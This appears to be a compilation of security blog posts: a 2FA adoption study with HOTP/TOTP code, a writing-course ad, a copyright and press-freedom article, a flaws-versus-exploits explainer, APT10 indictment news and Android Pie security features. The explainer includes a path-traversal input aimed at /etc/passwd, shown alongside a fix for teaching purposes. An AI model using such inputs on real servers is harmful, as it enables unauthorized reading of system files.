This post looks at two-factor authentication adoption in the wild, highlights the disparity of support between the various categories of websites, and illuminates how fragmented the two factor ecosystem is in terms of standard adoption.

Performing a longitudinal analysis highlights that the adoption rate of 2FA (two-factor authentication) has been mostly stagnant over the last five years, despite the ever increasing number of accounts hijacked due to the reuse of passwords found in data breaches and phishing attacks. Even more troublesome, looking at the types of 2FA offered reveals that some verticals, including some that have widely adopted 2FA, rely solely on custom two-factor solutions instead of two-factor standards such as U2F/FIDO and TOTP.
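To make the contrast with proprietary schemes concrete, TOTP is simple enough that its default form (RFC 6238: HMAC-SHA-1, 30-second time step, 6 digits) fits in a few lines. This is an illustrative sketch of what the standard computes, not production code:

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, timestamp=None):
    """6-digit TOTP code (RFC 6238 defaults: SHA-1, 30 s step)."""
    key = base64.b32decode(secret_b32, casefold=True)
    t = time.time() if timestamp is None else timestamp
    counter = struct.pack(">Q", int(t) // 30)  # moving factor: time step count
    digest = hmac.new(key, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                 # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return "%06d" % (code % 10**6)
```

Any authenticator app implementing the same standard produces the same codes from the same shared secret, which is exactly the interoperability that proprietary schemes forgo.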


Arguably, this behavior should be considered harmful to Internet ecosystem security, as it tends to create an unhealthy competition between sites that pushes users to use different systems and install many apps. For example, as you can see in the screenshot above, HSBC and Blizzard Entertainment rolled their own proprietary two-factor software that requires you to install their app. They also use their own lingo and workflow: e.g., HSBC asks for a PIN to generate the TOTP code and calls its software authenticator a “secure key,” which is confusing to say the least. These practices certainly do not make life easy for users, who have to learn the quirks of each system they enroll in.

In contrast, if every site were to use standardized second factors and a common language, then once users had installed a single app or bought U2F hardware dongles, they would be able to use them everywhere with a consistent user experience. In that ideal world, every site supporting 2FA would benefit from a virtuous snowball effect, and users’ lives would be a lot easier.

How we can help move from the currently fragmented 2FA ecosystem to a ubiquitous, standardized world is probably one of the greatest challenges we face as a community.

The remainder of this blog post is organized as follows:

  • Methodology: How the data was collected and what the study’s limitations are.
  • 2FA prevalence: A summary of how widely deployed 2FA is across the ~1,200 sites analyzed.
  • Adoption rate: A look at the 2FA adoption rate over the last five years.
  • Adoption by vertical: Teasing apart 2FA adoption by industry vertical.
  • Types of 2FA offered: A look at which types of 2FA (software, SMS, hardware, etc.) are the most commonly offered.
  • Standard adoption: How widely adopted U2F and TOTP are among the sites that offer 2FA.

Before diving into the results, let me briefly describe how the data was collected and analyzed.


Dongle authentication

To establish how many sites offer 2FA (two-factor authentication) and what kinds of second factors are offered in the wild, I pulled the list of sites offering 2FA from the dongleauth database. For historical perspective, I relied on the fact that the git repo has been active since 2014 and pulled the list of sites as it stood after the last git commit of each year from 2014 until 2017. Finally, I wrote a few Python scripts to aggregate the YAML files and compute the statistics needed to create the charts used in this post (raw results available here).
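The aggregation step can be sketched roughly as follows. Note that the site-entry schema used here (a `tfa` flag plus a `methods` list) is a hypothetical stand-in for illustration, not the actual dongleauth file format:

```python
# Rough sketch of the aggregation step: given parsed YAML site lists,
# count how many sites support 2FA and tally the methods offered.
# The schema ("tfa" flag plus a "methods" list) is a hypothetical
# stand-in for illustration; the real dongleauth files may differ.
from collections import Counter

def aggregate(site_lists):
    """site_lists: one parsed YAML document per category file."""
    total = with_2fa = 0
    methods = Counter()
    for sites in site_lists:
        for site in sites:
            total += 1
            if site.get("tfa"):
                with_2fa += 1
                methods.update(site.get("methods", []))
    return total, with_2fa, methods

sample = [[
    {"name": "examplebank", "tfa": True, "methods": ["sms", "software"]},
    {"name": "examplemail", "tfa": True, "methods": ["software", "u2f"]},
    {"name": "exampleshop", "tfa": False},
]]
total, with_2fa, methods = aggregate(sample)
print(f"{with_2fa}/{total} sites support 2FA ({100 * with_2fa / total:.1f}%)")
```

The real scripts do the same counting per year and per vertical to produce the charts below.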

Study limitations

The main limitation of this approach is that it is not systematic: ideally, we would go through all of the top 1,000 sites and manually verify whether 2FA is available and, if so, in which form and with what language. Similarly, the examples used throughout this post are anecdotal: I didn't do a formal analysis of the language used to describe 2FA across all sites. Finally, while many studies show that consumers are picky about which apps they install, there is no user research that directly shows users are unwilling to install all the security apps they need.

Study goal

That being said, this blog post is meant to be a conversation starter and to raise awareness, rather than a full-blown research paper. In that context, I would argue that the data presented in this post, which is used to support its claims, is good enough, as the issues are so widespread that they are obvious whichever way you look at them. In particular, looking at the database's coverage of the 2015 version of the Alexa top 1,000 sites (the recent version can't be downloaded since Amazon bought Alexa) shows that the database covers 40% of the top 100 domains and 23% of the top 500. This is not perfect, but it is more than enough to spot trends.

Future work

Moving forward, I agree that the community would benefit from a more rigorous study with clear recommendations that can be used as a reference by CISOs, CTOs, policy makers, and other key opinion formers. It is something that I hope we can do in 2019 - so, if you are interested in contributing, drop me a note!

With this out of the way, let’s delve into the study results.

How prevalent is 2FA?

Sites supporting 2FA

Overall, as of late 2018, 52.5% of the 1,149 sites listed in the dongleauth database support 2FA. As we will see throughout this post, while having one site in two support 2FA is good news, there is a lot of nuance behind this number that paints a somewhat grimmer picture.

Is 2FA adoption increasing?

2FA longitudinal support

To evaluate whether the adoption rate of 2FA is increasing, I plotted the number of sites in the database at the end of every year since its inception (2014) and how many of those sites were marked as supporting 2FA. The resulting chart, visible above, shows that the trend doesn't look great: while the number of sites supporting 2FA grew from 205 in 2014 to 603 in 2018, the total number of sites in the database grew from 382 to 1,149 over the same period. This means that the ratio of sites supporting 2FA barely changed over the last four years: the adoption rate was 53.66% back in 2014, dipped to 48% in 2016, and climbed back above 50% in 2017 (50.38%).

2FA adoption new vs existing sites

Now, one might argue that the main driver behind this stagnation is the fact that the dongleauth database grew by roughly 300% over the last five years (~1,200 sites, up from ~400) and that the newcomers are smaller or newer sites with fewer resources, which are therefore less likely to offer 2FA. To test (and refute) this hypothesis, I looked at how much of the 2FA adoption growth was due to existing sites turning on 2FA. As visible in the chart above, it turns out that very few sites that lacked 2FA when they were added to the database adopted it later. This leaves us with the conclusion that:

In recent years, the number of sites adopting 2FA has been mostly stagnant.

Understanding why sites don't adopt 2FA, and what can be done to incentivize them to do so, are key questions that need to be answered so that we can devise an effective global strategy to ensure steady adoption.

Support for various categories

2FA support per category

Looking at the adoption of 2FA by site category reveals that fintech (financial technology) and IT (information technology) services, such as cryptocurrency and cloud services, are leading the 2FA adoption charge. Unsurprisingly, sites tied to services that predate the Internet, such as utilities, food, and transport, have the lowest adoption rates. The most concerning part of this breakdown is that a few categories of sites that handle very sensitive user data, such as education (40.9%) and health (21%), have very low adoption rates. This highlights the need, as a community, to help those sites jump on the 2FA bandwagon to better protect their users' data.

Type of second factor supported

Type of 2FA supported

Looking at the types of 2FA supported across the board reveals that software-based 2FA is by far the most widely supported second factor, offered by 82.1% of the sites that support 2FA. SMS, at 45.6%, is a distant second, and hardware tokens are third, with only a 36.2% adoption rate. This breakdown is probably best explained by the fact that software-token systems are easy to implement and have no operational cost, whereas sending SMS messages or provisioning hardware tokens does.

Hardware 2FA keys

Obviously, the price argument is quickly becoming obsolete with the rise of the U2F hardware standard, which allows any site to rely on security keys for 2FA with a few lines of JavaScript. With WebAuthn and FIDO2 becoming mainstream in 2018, it will become easier than ever to offer hardware-based 2FA. This is great news for user security, as U2F keys are the only type of second factor that can't be phished, because the proof of ownership of the second factor is exchanged directly between the user's key and the website.

The WebAuthn/FIDO2 standards will allow sites to offer unphishable hardware-based 2FA with just a few lines of JavaScript.

However, all of this will only happen if sites indeed leverage standards and don’t invent their own version of second factors. This brings us to the last and probably most important part of the post, as it comes down to the future of 2FA: do websites follow standards?

2FA standard adoption

As I alluded to in the introduction, the key to getting more users to adopt 2FA is for every site's two-factor options to be standardized. This would allow users to reuse their existing apps and hardware tokens, instead of having sites compete to get users to install proprietary apps or buy single-site tokens (which is also bad for the planet).

The industry's willingness to adopt standards is becoming even more crucial as the next generation of hardware-token standards, FIDO2, which offers a browser-native UI, hits the mainstream in 2019.

Before delving into adoption rate, let me briefly recap what standards exist and when they appeared, so that everyone is on the same page:

  • Software token: The industry standards for software-based 2FA are HOTP ("HMAC-based one-time password") and TOTP ("time-based one-time password"). HOTP was standardized in RFC 4226 in 2005, and TOTP in RFC 6238 in 2011. The security risk associated with both protocols is that users need to input the code themselves, which makes it phishable. This risk, along with ease of use, was the driving reason for creating a hardware-based standard that doesn't require users to input anything; they just touch a trusted device.

U2F key example

  • Hardware token: The standard for hardware tokens created by Google and Yubico is called U2F (universal second factor) and was released by the FIDO Alliance in 2015. Development of its successor, FIDO2, started in 2016. The main difference between U2F and FIDO2 is that FIDO2 includes both a protocol to talk to hardware devices (CTAP1) and a web API called WebAuthn that allows sites to use a native browser UI (as visible below) to prompt users to touch their key. WebAuthn is becoming mainstream, with Chrome/Firefox/Edge support rolling out. You can test the native UI here.
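To show how small the software-token standards above really are, here is a minimal sketch of HOTP and TOTP in pure Python (for illustration only; a real deployment would also accept base32-encoded secrets and tolerate clock drift):

```python
# Minimal HOTP (RFC 4226) and TOTP (RFC 6238) in pure Python, to show
# how small the software-token standards are. A real deployment would
# also accept base32-encoded secrets and tolerate clock drift.
import hashlib
import hmac
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    # HMAC-SHA1 over the big-endian counter, then "dynamic truncation".
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, timestep: int = 30, digits: int = 6) -> str:
    # TOTP is just HOTP keyed on the current 30-second time window.
    return hotp(secret, int(time.time()) // timestep, digits)

# First test vector from RFC 4226 appendix D (ASCII secret, counter 0).
assert hotp(b"12345678901234567890", 0) == "755224"
```

Any site that verifies codes this way works with every standard authenticator app, which is exactly the reusability argument made above.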


Those standards, especially WebAuthn, offer the promise of a consistent 2FA user experience across the Internet, which, in the long run, is critical to making unphishable accounts the norm.

Standard overall adoption rate

2FA standard adoption rate

Having reusable two-factor tokens/apps and an Internet-wide consistent experience is only possible if sites adopt standards, which is why measuring and tracking adoption is so important. As you can see in the figure above, the current adoption rate of standards across the industry is pretty bleak: only 11% of hardware-token implementations follow the U2F/FIDO standard, and only 26.8% of software-token implementations follow TOTP.

While the lack of U2F support can be explained by the fact that it is relatively new and was not supported by all major browsers, the lack of support for TOTP is more concerning. The protocol has been around for close to a decade, and there are countless apps on Android and OSX that support it, yet barely one site in four supports it. This shows the industry's resistance to adopting standards, and thus calls for a large community effort to get sites to adopt the standard.

Language disparity

Security key setup in Paypal

As my friend Brad pointed out, on top of not using standards, many websites use their own made-up language, which further increases user confusion about what to do for security. For example, as visible above, PayPal talks about registering your phone as a "security key" when it is in reality an SMS system. Twitter calls 2FA "login verification," and Bank of America branded it "SafePass" and copyrighted the word… For more examples, check out the EFF article on the subject.

Adoption by industry

Adoption by Industry

Breaking down HOTP/TOTP support by industry type reveals that industries that predate the Internet era are the least likely to adopt the standards. This raises the question of how the security community can engage with those industries and encourage them to participate in 2FA standardization. The chart below shows that the problem is just as pervasive for the U2F standard, which suffers from the same lack of support as HOTP/TOTP.

Follow U2F standards by Industry


To conclude, we are finally reaching the point where we have the technologies to offer users unphishable accounts with minimal friction and a consistent native UI across the Internet. It is up to us, as a community, to make sure that this doesn't take 15 years, as the deployment of HTTPS did. We need to engage the industry as a whole and get as many sites as possible on the bandwagon, as quickly as possible, to create a virtuous, self-reinforcing circle instead of a fragmented ecosystem.

A big thanks to Alexei, Aude, Brad, and Christiaan for their feedback and insights -- this post wouldn't be half as good without them.

Thank you for reading this blog post till the end! Don't forget to share it, so your friends and colleagues can also learn about two-factor authentication adoption in the wild. To get notified when my next post is online, follow me on Twitter, Facebook, or LinkedIn. You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS.

A bientôt!

A Short Cybersecurity Writing Course Just for You

My new writing course for cybersecurity professionals teaches how to write better reports, emails, and other content we regularly create. It captures my experience of writing in the field for over two decades and incorporates insights from other community members. It’s a course I wish I could’ve attended when I needed to improve my own security writing skills.

I titled the course The Secrets to Successful Cybersecurity Writing: Hack the Reader. Why “hack”? Because strong writers know how to find an opening to their readers’ hearts and minds. This course explains how you can break down your readers’ defenses, and capture their attention to deliver your message—even if they’re too busy or indifferent to others’ writing.

Here are several examples of such “hacking” techniques from course sections that focus on the structure and look of successful security writing:

  • Headings: Use them to sneak in the gist of your message, so you can persuade your readers even if they don't read the rest of your text.
  • Lists: Rely on them to capture your readers’ attention when they skim your message for key ideas.
  • Figure Captions: Include them to influence the conclusion your readers reach even if they only glance at the graphic. 

This is an unusual opportunity to improve your writing skills without sitting through tedious lectures or writing irrelevant essays. Instead, you’ll make your writing remarkable by learning how to avoid common pitfalls.

For instance, this slide opens the discussion about expressing ideas clearly, concisely, and correctly:

This course is grounded in the idea that you can become a better writer by learning how to spot common problems in others’ writing. This is why the many examples are filled with delightful errors that are as much fun to find as they are to correct.

One of the practical takeaways from the course is a set of checklists you can use to eliminate issues related to your structure, look, words, tone, and information. For example:

The course will help you stand out from other cybersecurity professionals with similar technical skills. It will help you get your executives, clients, and colleagues to notice your contribution, accept your advice, and appreciate your input. You’ll benefit whether you are:

  • A manager or an individual team member
  • A consultant or an internally-focused employee
  • A defender or an attacker
  • An earthling or an alien

You have a limited opportunity to attend a beta version of the course. You will not only get an early adopter discount and bragging rights, but also shape the course for future participants.

Starting around September 2019 you’ll be able to take the course almost exclusively online via the SANS OnDemand platform. If you want me to notify you when the OnDemand version launches, just drop me a note.

Copyright lawsuit over Trump photo use is a press freedom fight, too

Donald Trump crashes a wedding at his Bedminster Golf Club, modified by the author and used without permission under 17 USC § 107


In a decision that could have dangerous reverberations for press freedom, a federal district judge ruled last week that Esquire violated a copyright held by a Deutsche Bank vice president when it published his photo of Donald Trump crashing a stranger’s wedding at his New Jersey club.

The photo, snapped on an iPhone and posted to Instagram by another guest, was used to illustrate an article about the president’s unplanned appearances at events at his private venue. Esquire’s parent company Hearst had argued that its inclusion of the photo was a fair use—an argument Judge Gregory Woods rejected in a summary judgment order in Otto v. Hearst last Monday.

That decision could effectively give private individuals—particularly individuals with private access to newsworthy people—inappropriate power to shape or limit the visual coverage of public officials, by allowing them to pick and choose which outlets may run those photos, and under what terms.

Trump’s appearances at his own business locations, from which he and his family still profit, are widely described as evidence of corruption. Images of the president and other public officials at Trump properties have been the basis of dozens of news stories. The photographs themselves are newsworthy and (especially in a time of diminished trust in the media) cannot be substituted by verbal descriptions.

The plaintiff in this case, Jonathan Otto, appears to be willing to license the picture to anybody ready to pay. Indeed, as he texted another wedding guest to whom he had sent the image: “Hey, TMZ & others using my photo above without credit/compensation. You send to anyone? I want my cut.”

But it’s important to note that, if the law deems a license for this sort of photo is necessary, that license would be issued entirely at the discretion of the copyright holder. Otto could offer his photo only to outlets known to provide favorable coverage of the president, say, or charge a rate prohibitive to smaller operations.

It is a bad policy that gives any individual—especially an executive at a bank with extensive financial ties to the president—the power to control whether and how journalists can present newsworthy images to the public.

Instead, judges should interpret the fair use doctrine to give the widest possible berth to journalists. This is consistent with the law. Fair use is determined on a case-by-case basis, but the legal test that judges apply explicitly names “news reporting” as one of the purposes for which it is intended. There are a few technical possibilities for how attorneys and judges can make that argument, but—especially given the potentially ruinous damages associated with copyright violations—the effect must be a firm understanding of broad fair use rights.

Judge Woods nods to such a possibility in a section acknowledging the “fact-driven nature” of fair use analysis, saying:

It is not unreasonable to think that the use could be considered fair in another matter involving a news publisher’s incorporation of a personal photograph. Though the Court did not find fair use in this particular instance, it does not preclude a finding of fair use in other matters, depending on the balance of the fair use factors. Therefore, the Court emphasizes that a finding of fair use in a matter involving personal photographs used by the media might be readily sustainable on facts other than those presented here.

The circumstances of this photo and its publication, though, precisely fit a fact pattern that needs to be allowed. Some of the facts that Judge Woods ruled weighed against a finding of fair use:

  • The article was about the event depicted in the photo, not about the photo itself. But that will nearly always be the case with news reporting.
  • Esquire included the entire photograph, instead of cropping or editing it. But presenting the audience with the primary source materials is a valuable and important practice, and shouldn’t be discouraged by the law.
  • There is a potential market for such a work because an outlet like TMZ is willing to pay a licensing fee. But the fact that there are willing licensees doesn’t and shouldn’t change the newsworthiness analysis. A single outlet can’t be allowed to render other uses unfair simply by “establishing a market”—especially considering this subject already allegedly worked with a gossip publication to keep other outlets from doing fair reporting.

Fair use is a balancing test, and the ideals of a free press and an informed public outweigh the policy goal of bestowing outsized media influence or licensing paydays on people who attend weddings at Trump properties.

The situation is especially urgent because of a second New York court ruling issued earlier this year, Goldman v. Breitbart, which cast uncertainty on another time-tested technique for reporting on material sourced from social media sites.

In that case, Judge Katherine Forrest broke with a long-standing rule called the "server test," which says that operators of websites aren’t liable for material that is simply embedded from other sites around the web. In many cases, determining the copyright status of newsworthy images can be prohibitively difficult and time-consuming; the server test simplified that process, giving publishers and journalists an easy rule to follow.

There may be other reasons a publisher wants to serve their own media—to preserve it in case the original is modified or deleted, or to protect the privacy of their readers by limiting third-party assets—but the server test at least sidestepped the copyright considerations. If publishers decide they can no longer rely on the server test, they could be forced to turn more to licensing agreements and fair use.

That case is still proceeding through the court system (delayed in part by the unexpected retirement of Judge Forrest), and both cases are likely to wind their way through eventual appeals. But in the meantime, reporters and publishers are left with fewer safe options for including public and newsworthy images than they had at the beginning of 2018.

Flaws and Vulnerabilities and Exploits – Oh My!

With the slew of terms that exist in the world of application security, it can be difficult to keep them all straight. “Flaws,” “vulnerabilities,” and “exploits” are just a few that are likely on your radar, but what do they mean? If you’ve used these words interchangeably in the past, you’re not alone. They’re easy to confuse with one another, likely because there’s a relationship between all of these terms; however, the distinctions between them are real.

To give you a better idea of how to distinguish between these security issues and the different roles that they play within AppSec, let’s take a closer look at the similarities and differences between flaws, vulnerabilities, and exploits.

Flaws vs. Vulnerabilities

Flaws and vulnerabilities are perhaps the easiest two security defects to mix up, leading many security professionals to wonder what exactly the difference between the two is.

To put it simply, a flaw is an implementation defect that can lead to a vulnerability, and a vulnerability is an exploitable condition within your code that gives an attacker a way in. So, just because a flaw isn’t a vulnerability at the present moment doesn’t mean it can’t become one in the future as environments and architectures change or get updated. Any updates to the architecture, or changes to the function of your application, can expose it to attacks that were previously hidden.

Once someone has figured out a way to attack – or exploit – a flaw, the flaw becomes a vulnerability. If you’re still confused, think of it this way: all vulnerabilities are flaws, but not all flaws are vulnerabilities. All flaws have the potential to become vulnerabilities.

For some guidance when it comes to flaws, a helpful resource is MITRE’s Common Weakness Enumeration (CWE) list, which provides a common baseline standard for identifying different classes of weaknesses within application structures that can result in possible vulnerabilities.

Only when there is a realization of a structural defect that can allow for an attack to occur does a vulnerability arise. Vulnerabilities, similarly to flaws, are categorized by MITRE’s Common Vulnerabilities and Exposures (CVE) list. Generally, when we’re looking at CVE entries, these are recognized, publicly-known cybersecurity vulnerabilities within existing codebases. Additionally, you could reference the National Institute of Standards and Technology’s National Vulnerability Database (NVD), which is updated whenever a new vulnerability is added to the CVE dictionary of vulnerabilities. The NVD supplements the CVE list by conducting additional analysis on the vulnerabilities, and by determining the impact that vulnerabilities can have on an organization.


Exploits

“Exploit” is often used to describe weaknesses in code where hacking can occur, but in reality, it’s a slightly different concept. Rather than being a weakness in code, the term “exploit” refers to a procedure or program intended to take advantage of a vulnerability. Another way to think about it: an exploit is a vulnerability “weaponized” for a purpose, because an exploit makes use of a vulnerability to attack a system.

So, to reiterate, rather than being the weakness in the code, an exploit is how you would attack that code. It allows an attacker to utilize the application’s logic against it in a way that was never intended by the developers.
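To make the chain concrete, here is a toy example (mine, not from the article) of a path-traversal flaw in a hypothetical file server, the crafted input that exploits it, and a fix:

```python
# Toy example (not from the article): a path-traversal FLAW in a
# hypothetical file server, which becomes a VULNERABILITY once `name`
# comes from untrusted users, and the crafted input that EXPLOITS it.
import os

PUBLIC_DIR = "/var/www/public"

def resolve_public_path_flawed(name: str) -> str:
    # FLAW: user input is joined into the path with no validation.
    return os.path.join(PUBLIC_DIR, name)

def resolve_public_path_fixed(name: str) -> str:
    # Fix: normalize, then confirm the result stays inside PUBLIC_DIR.
    path = os.path.normpath(os.path.join(PUBLIC_DIR, name))
    if not path.startswith(PUBLIC_DIR + os.sep):
        raise ValueError("path escapes the public directory")
    return path

exploit = "../../../etc/passwd"  # the vulnerability "weaponized"
print(os.path.normpath(resolve_public_path_flawed(exploit)))
```

On a POSIX system the flawed resolver happily yields /etc/passwd, while the fixed one raises; the defect was a flaw all along, but it only became a vulnerability once untrusted input reached it.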

As we can see, each of these concepts has its own distinct meaning, and yet they are closely tied together in the world of application security: the flaw is the weakness in a codebase, the vulnerability is the realization of that weakness, and the exploit is the means by which that vulnerability is leveraged in an attack.

Testing Methods

Now that you have an understanding of the distinctions between these terms, you might be wondering how to test for flaws and vulnerabilities in your code. After all, step one is awareness, but step two is knowing how to find and prevent these defects from putting your data at risk.

Static Application Security Testing (or SAST) is going to help you find the flaws in your code that could be possible vulnerabilities. Static analysis estimates – but does not prove – the exploitability of these flaws so that you can prioritize which to fix first. Knowing whether or not these flaws are certain vulnerabilities takes more of an understanding of the context in which the application is being run and the architecture of the application.

Your next line of defense comes in the form of Dynamic Application Security Testing (DAST) and Manual Penetration Testing (commonly known as MPT). These testing methods are typically more familiar to developers, as they’ve historically been the common approaches for assessing applications for vulnerabilities. Dynamic analysis and MPTs run against a live application, and because they’re testing the code behavior from the outside in, we can actually see whether these vulnerabilities are exploitable.

The third type of assessment at your disposal is Software Composition Analysis (SCA). SCA focuses on identifying risks that might be introduced by open source code components and third-party libraries. It does this by scanning against an inventory of known, documented vulnerabilities – like the National Vulnerability Database.

While each testing method has unique upsides and drawbacks, they all have their place within the software development lifecycle. By using all three together in an integrated manner, you’ll be able to assess when risk exists within an application, and furthermore, you’ll be protecting yourself at every stage within your SDLC.

To learn even more about these security defects discussed here, and how to remediate them once you’ve found them, check out this webinar.

Indictment of Chinese Hackers Underscores Need for Stronger Cybersecurity

Veracode Chinese Hackers Indicted Spearphishing

According to a newly unsealed indictment, two Chinese nationals working with the Chinese Ministry of State Security have been charged with hacking a number of U.S. government agencies and corporations. The court filing indicates that Zhu Hua and Zhang Jianguo, members of Advanced Persistent Threat 10 (APT10), used phishing techniques in order to steal intellectual property, confidential business data, and technological information between 2006 and 2018.

The APT10 Group was able to access more than 40 computers to steal confidential data from the U.S. Department of the Navy, including the personally identifiable information of more than 100,000 Navy personnel. The NASA Goddard Space Center and the space agency’s Jet Propulsion Lab were also named in the filing, according to a report in TechCrunch.

Tailored and Convincing Spearphishing Gave APT10 Unfettered Access

Rather than taking a spray-and-pray approach to their attacks, APT10 carefully selected their targets and created tailored email campaigns to trick recipients into opening malicious Word document attachments and files. The emails appeared to originate from a trusted sender, used legitimate-looking filenames and file types, and pertained to something relevant to the victim. An example included in the indictment involved a helicopter manufacturer that received an email with the subject line “C17 Antenna problems” and a malicious Microsoft Word attachment named “12-204 Side Load testing.doc.”

This methodology created an air of safety, leading email recipients to open the messages and attachments without suspicion or question. The indictment indicates that the malware used in the campaigns typically included customized variants of a remote access Trojan (RAT), including one called Poison Ivy, and keystroke loggers used to steal usernames and passwords as users typed in their credentials.

The “Technology Theft Campaign”

Over the course of this campaign, members of APT10 – including Hua and Jianguo – gained access to approximately 90 computers belonging to commercial and defense technology companies, as well as U.S. Government agencies in at least 12 states. They stole hundreds of gigabytes of sensitive data and targeted the computers of companies across dozens of industries and technologies, including aviation, space and satellite, manufacturing, pharmaceutical, oil and gas exploration and production, communications, computer processing, and maritime.  

The “MSP Theft Campaign”

In 2014, the defendants and co-conspirators in APT10 hacked into the computers and networks of managed service providers (MSPs) for businesses and governments around the world. Because MSPs are responsible for remotely managing their clients’ information technology infrastructure – like servers, storage, networking, consulting, and support services – the attackers were able to steal intellectual property and confidential business data on a global scale. The indictment states that through one particular MSP, which supports operations for the Southern District of New York, the group was able to access data of clients from 12 different countries across dozens of industries, including banking and finance, healthcare, and biotechnology. The malware used in this campaign was programmed to communicate with domains hosted by DNS service providers that were assigned IP addresses of computers APT10 controlled. In total, the group registered roughly 1,300 unique malicious domains.

Stronger Security Hygiene Is Necessary to Avoid Digital Theft

Although prosecutions are unlikely, the details of the indictment clearly indicate that if a tech company is vulnerable, its valuable intellectual property and personal data can be taken.

“Tech companies aren’t ramping up their security to protect their IP and data commensurate with the value attackers put on the data,” said Veracode CTO Chris Wysopal. “Compromising endpoints with vulnerable Word Documents means there isn’t good endpoint hygiene. Microsoft has recently released Windows Sandbox for Windows Pro and Enterprise users.  It would be a good idea to open externally sourced Word Documents with Word running in Windows Sandbox.”

Android Pie à la mode: Security & Privacy

Posted by Vikrant Nanda and René Mayrhofer, Android Security & Privacy Team

[Cross-posted from the Android Developers Blog]

There is no better time to talk about Android dessert releases than the holidays because who doesn't love dessert? And what is one of our favorite desserts during the holiday season? Well, pie of course.

In all seriousness, pie is a great analogy because of how the various ingredients turn into multiple layers of goodness: right from the software crust on top to the hardware layer at the bottom. Read on for a summary of security and privacy features introduced in Android Pie this year.
Platform hardening
With Android Pie, we updated File-Based Encryption to support external storage media (such as expandable storage cards). We also introduced support for metadata encryption where hardware support is present. With filesystem metadata encryption, a single key present at boot time encrypts whatever content is not encrypted by file-based encryption (such as directory layouts, file sizes, permissions, and creation/modification times).

Android Pie also introduced a BiometricPrompt API that apps can use to provide biometric authentication dialogs (such as a fingerprint prompt) on a device in a modality-agnostic fashion. This functionality creates a standardized look, feel, and placement for the dialog. This kind of standardization gives users more confidence that they're authenticating against a trusted biometric credential checker.

New protections and test cases for the Application Sandbox help ensure all non-privileged apps targeting Android Pie (and all future releases of Android) run in stronger SELinux sandboxes. By providing per-app cryptographic authentication to the sandbox, this protection improves app separation, prevents overriding safe defaults, and (most significantly) prevents apps from making their data widely accessible.
Anti-exploitation improvements
With Android Pie, we expanded our compiler-based security mitigations, which instrument runtime operations to fail safely when undefined behavior occurs.

Control Flow Integrity (CFI) is a security mechanism that disallows changes to the original control flow graph of compiled code. In Android Pie, it has been enabled by default within the media frameworks and other security-critical components, such as for Near Field Communication (NFC) and Bluetooth protocols. We also implemented support for CFI in the Android common kernel, continuing our efforts to harden the kernel in previous Android releases.

Integer Overflow Sanitization is a security technique used to mitigate memory corruption and information disclosure vulnerabilities caused by integer operations. We've expanded our use of Integer Overflow sanitizers by enabling their use in libraries where complex untrusted input is processed or where security vulnerabilities have been reported.
Continued investment in hardware-backed security

One of the highlights of Android Pie is Android Protected Confirmation, the first major mobile OS API that leverages a hardware-protected user interface (Trusted UI) to perform critical transactions completely outside the main mobile operating system. Developers can use this API to display a trusted UI prompt to the user, requesting approval via a physical protected input (such as a button on the device). The resulting cryptographically signed statement allows the relying party to reaffirm that the user would like to complete a sensitive transaction through their app.

We also introduced support for a new Keystore type that provides stronger protection for private keys by leveraging tamper-resistant hardware with dedicated CPU, RAM, and flash memory. StrongBox Keymaster is an implementation of the Keymaster hardware abstraction layer (HAL) that resides in a hardware security module. This module is designed and required to have its own processor, secure storage, True Random Number Generator (TRNG), side-channel resistance, and tamper-resistant packaging.

Other Keystore features (as part of Keymaster 4) include Keyguard-bound keys, Secure Key Import, 3DES support, and version binding. Keyguard-bound keys enable use restriction so as to protect sensitive information. Secure Key Import facilitates secure key use while protecting key material from the application or operating system. You can read more about these features in our recent blog post as well as the accompanying release notes.
Enhancing user privacy

User privacy has been boosted with several behavior changes, such as limiting the access background apps have to the camera, microphone, and device sensors. New permission rules and permission groups have been created for phone calls, phone state, and Wi-Fi scans, as well as restrictions around information retrieved from Wi-Fi scans. We have also added associated MAC address randomization, so that a device can use a different network address when connecting to a Wi-Fi network.

On top of that, Android Pie added support for encrypting Android backups with the user's screen lock secret (that is, PIN, pattern, or password). By design, this means that an attacker would not be able to access a user's backed-up application data without specifically knowing their passcode. Auto backup for apps has been enhanced by providing developers a way to specify conditions under which their app's data is excluded from auto backup. For example, Android Pie introduces a new flag to determine whether a user's backup is client-side encrypted.
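For app developers, the exclusion conditions mentioned above are declared in the app's backup rules XML. A minimal sketch, assuming the `requireFlags="clientSideEncryption"` condition introduced with Android Pie (the file name is illustrative):

```xml
<?xml version="1.0" encoding="utf-8"?>
<!-- res/xml/backup_rules.xml, referenced from the manifest via
     android:fullBackupContent. The requireFlags condition means this
     file is backed up only when the backup is client-side encrypted
     with the user's screen lock secret. -->
<full-backup-content>
    <include domain="file" path="sensitive_notes.txt"
             requireFlags="clientSideEncryption" />
</full-backup-content>
```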

As part of a larger effort to move all web traffic away from cleartext (unencrypted HTTP) and towards being secured with TLS (HTTPS), we changed the defaults for Network Security Configuration to block all cleartext traffic. We're protecting users with TLS by default, unless you explicitly opt in to cleartext for specific domains. Android Pie also adds built-in support for DNS over TLS, automatically upgrading DNS queries to TLS if a network's DNS server supports it. This protects information about IP addresses visited from being sniffed or intercepted on the network level.
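Concretely, the new default and the per-domain opt-in described above live in the app's Network Security Configuration file; a minimal sketch (the domain name is illustrative):

```xml
<?xml version="1.0" encoding="utf-8"?>
<!-- res/xml/network_security_config.xml: cleartext is blocked by
     default on Android Pie; the domain-config below is the explicit
     opt-in for a single legacy domain. -->
<network-security-config>
    <base-config cleartextTrafficPermitted="false" />
    <domain-config cleartextTrafficPermitted="true">
        <domain includeSubdomains="true">legacy.example.com</domain>
    </domain-config>
</network-security-config>
```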

We believe that the features described in this post advance the security and privacy posture of Android, but you don't have to take our word for it. Year after year our continued efforts are demonstrably resulting in better protection as evidenced by increasing exploit difficulty and independent mobile security ratings. Now go and enjoy some actual pie while we get back to preparing the next Android dessert release!


